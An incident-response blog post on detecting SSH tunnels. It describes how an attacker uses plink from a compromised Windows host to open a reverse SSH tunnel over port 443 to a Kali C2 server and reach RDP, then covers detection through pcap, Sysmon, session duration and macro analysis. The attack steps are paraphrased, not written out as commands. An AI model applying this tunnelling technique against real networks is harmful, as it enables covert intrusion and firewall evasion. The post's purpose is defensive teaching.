Incident Response Case: From SSH Tunnel To Endpoint Analysis
In this post we will discuss detecting SSH tunnels on a network and we investigate an incident. First of all, SSH is an encrypted protocol which provides secure shell connections between client and server. In SSH server/client model, client sends a connection request to the server then server sends the public key to the client. Client proof his identity by using his own SSH password or Digital Signuture. Client keeps the public key at all time. RSA is used for signing and encryption and DSA is used for signing. If client and server can negotiate each other under the appropriate conditions, SSH connection is established and keeps until it is closed. Before We start I present you my Udemy Trainings if you want you can benefit my training for learning deeply;
Lets examine the packet capture is given below for comprehend the steps of connection.
SSH connection is established from Ubuntu Client to Kali’s SSH Server.
If you notice the connection steps even if tcp stream is encrypted, you can see the SSH version from sniffed packets. We can use some strings like SSH or OpenSSH etc.. for detecting the SSH connections in a pcap file. Attackers and adversaries use SSH tunnels for hiding their network activity, tunnelling other protocols inside SSH connection and data exfilration purposes. SSH tunnel imlementation is shown the below. First attacker gains a reverse shell from the victem. Attacker uploads to the victem Putty’s command line version, it’s called plink. Then client opens a SSH connection to C2C (In this example command and control server is Kali) and says to C2C “hey I am a new victem, I am connecting you via SSH, open the specified port on your own local and redirect the network which is sended this port to my predetermined port”. Don’t confuse about it. Lets practice;
In victem Side (Windows 8):
Screenshoot is given above shows us SSH port redirection method via plink. Let’s analysis the command; Connect 172.16.8.36 IP’s TCP 443.port via SSH, say him, he must open 3390 TCP port and every single packet is sended to KALI’S 3390 TCP port, will be forwarded to my 3389 port inside my encrypted SSH connection. If the SSH session can be established by this way, when attacker connects via RDP his local 3390. TCP port, his connection is redirected to the victems 3389 TCP port. Let’s try it;
As you see RDP connection is hidden through SSH connection. Attacker bypasses the firewall and NAT rules by this way moreover Security admin can’t detect RDP or other connections which are tunnelled inside SSH. In the first example attacker used TCP 443. port for reverse SSH connections because generally firewalls are implemented as permit TCP 443,80 and UDP 53 from internal network to the external network. Attackers benefit it and initiate reverse shells by using this ports. For Detecting SSH tunnels we watch out SSH connections which is initiated from internal network to the external network which pass through TCP 443, 80 or UDP 53 or TCP 53. Could it be possible a client connect his own SSH server is located external network and perform legitimate activities? Answer is yes but still this traffic is anomaly because you should have connection policy and your network security admin should segment and discrate the network and classified it then implement whitelisting and access control rules. Once you detect an anomaly from network you should go to endpoint which is orginiate of the traffic and examine Sysmon logs ( you can aggregate the logs and forward to Splunk or ELK or SIEM) and dump the memory image for analysing. After matches the socket of the traffic and caused process we can analyze it better. Lets analyze the pcap for detecting SSH tunnel. Always analyze the cases like an attacker, If you don’t have attacker perspective you can’t solve the attack map.
Scenerio based Incident Response steps;
I will search the OpenSSH keyword in this pcap;
You realized an anomaly while monitoring traffic from SIEM and you decided to get pcap. When you analyzed the pcap file you call attention to a SSH connection which is passed through TCP 443. Is it convenience situation for your security procedure? Is it appropriate for your acesss control?
You examine the session start time and end time and you see this session has been opened for 3 days. It’s suspicious traffic. Then you go to orginate of the traffic. Endpoint IP address is 172.16.8.3 and start to investigate the sysmon logs; You realize that plink.exe uploaded to the client before 2 minutes ago, reverse SSH connection initiated.
From sysmon logs, examine the sockets and process for detecting the process is caused for SSH connections.
As you see from above port forwarding is used for accessing 3389 TCP (RDP) from external network. And if you log review you can see the command line parameter of SSH tunnel. Bingo!!!
But still don’t know how to adversary compromise this machine? Keep on investigation. I review the socket logs and I found malicious powershell code before SSH connection established;
File type is shown as RTM and my analysis go on step back step. In last incidents I detect a word file which dropped this malicious powershell code:
After this detection I analyze the file for creating IOC. I used olevba for extracing macros. I decoded the powershell code by using base64 decoder;
Finally I created IOC rules for this malicious file;
In a conclusion, For detecting SSH tunnels you notice Port, Protocol mismatch, Was the connection initiated from internal to external 443,53,80? Session times are very important. Long time period connections should be investigated. Connection’s destination IP addresses can be queried for learning whaether malicious or not. Most of the time Network analysis should be supplemented with endpoint analysis.
See you!
